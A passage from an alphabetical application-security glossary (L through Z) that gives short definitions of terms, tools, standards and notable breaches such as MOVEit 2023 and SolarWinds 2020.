  • Let's Encrypt — free certificate authority.
  • libsodium / NaCl — opinionated, hard-to-misuse cryptography library.
  • Likelihood — how often an attack is tried, in your context.
  • LinkedIn 2012 — unsalted SHA-1 → 117M passwords cracked.
  • MFA (Multi-factor authentication) — requiring more than one factor for login.
  • MOVEit 2023 — SQL injection zero-day → mass data theft.
  • Nonce — number used once.
  • Non-repudiation — proof that a specific party performed an action and cannot deny it.
  • NVD — NIST's National Vulnerability Database.
  • OAuth 2.0 — authorisation protocol that issues short-lived tokens after login.
  • OIDC (OpenID Connect) — thin identity layer on top of OAuth 2.0.
  • Okta — enterprise identity provider; involved in 2022 third-party breach.
  • OpenSSL — ubiquitous TLS / crypto library; footgun-prone.
  • OSV / OSV-Scanner — Google's package-focused vulnerability database and scanner.
  • OWASP Top 10 — canonical taxonomy of common application vulnerabilities.
  • OWASP ZAP — open-source intercepting proxy / scanner.
  • Passkey / WebAuthn — modern phishing-resistant authentication standard.
  • PCI DSS — payment-card data standard.
  • Pepper — global secret added to every password hash.
  • PII (Personally Identifiable Information) — names, emails, IDs that can be tied to a real person.
  • PKI (Public Key Infrastructure) — system of certificates and authorities tying public keys to identities.
  • Postmortem / retrospective — write-up after an incident describing what happened, why, and what changes.
  • Principle of least privilege — give every component only the permissions it needs.
  • Public key / private key — the asymmetric pair.
  • Race condition / TOCTOU — wrong answer caused by ordering between check and use.
  • Rate limiting — bounding work per unit time.
  • ReDoS (Regex Denial of Service) — pathological regex evaluation that ties up CPU.
  • Renovate — open-source dependency updater.
  • Residual risk — what remains after the chosen defence has been applied.
  • Responsible disclosure — reporting a vulnerability privately before public release.
  • RBAC (Role-Based Access Control) — permissions attached to roles; users get roles.
  • ABAC (Attribute-Based Access Control) — decisions on attributes (user, resource, time, context).
  • Risk — likelihood × impact.
  • Salt — random per-user value mixed into the password before hashing.
  • SBOM (Software Bill of Materials) — manifest of all dependencies and their versions.
  • Scrypt — memory-hard password hashing.
  • Secret — small piece of data that must not leak (password, token, key).
  • Security misconfiguration — default credentials, open buckets, debug endpoints.
  • Security theatre — control that looks like security without measurable risk reduction.
  • Sensitive data exposure — secrets or PII leaked through logs, URLs, or weak transport.
  • Session — server-side state that lets the client skip re-authentication for a while.
  • Sign in with Apple / Google — consumer SSO providers.
  • Signal — end-to-end encryption done right; reference example.
  • SIM swap — attacker convinces the carrier to move a phone number to their SIM.
  • SOC 2 — US-origin attestation report on operational controls.
  • SolarWinds 2020 — supply-chain compromise of Orion software updates.
  • SSO (Single sign-on) — one login across multiple apps.
  • SSRF (Server-Side Request Forgery) — server is tricked into fetching attacker-controlled URL.
  • Symmetric encryption — same key encrypts and decrypts.
  • Threat — possibility of an attack.
  • Threat actor — who would do it (see Attacker).
  • Threat model — short written list of what you protect, who attacks, and how.
  • TLS (Transport Layer Security) — standard protocol that encrypts and authenticates network traffic.
  • TOTP (Time-based one-time password) — 6-digit code from an authenticator app, refreshing every 30 seconds.
  • Token (access / refresh / ID) — string that proves the bearer has permission.
  • Trivy — open-source container and infra scanner.
  • Uber 2016 — hardcoded credentials in GitHub → breach + cover-up.
  • Vault (HashiCorp) — open-source secrets-management standard.
  • Vulnerability — a flaw that an attacker can exploit.
  • WAF (Web Application Firewall) — filtering layer at the edge that blocks known attack shapes.
  • WebAuthn / passkeys — modern phishing-resistant authentication standard.
  • XSS (Cross-Site Scripting) — attacker-controlled content rendered as code in another user's browser.
  • Yahoo 2013 — 3B accounts; weak hashing; widely cited breach.
  • Zero trust — every request is suspect, even from inside the network.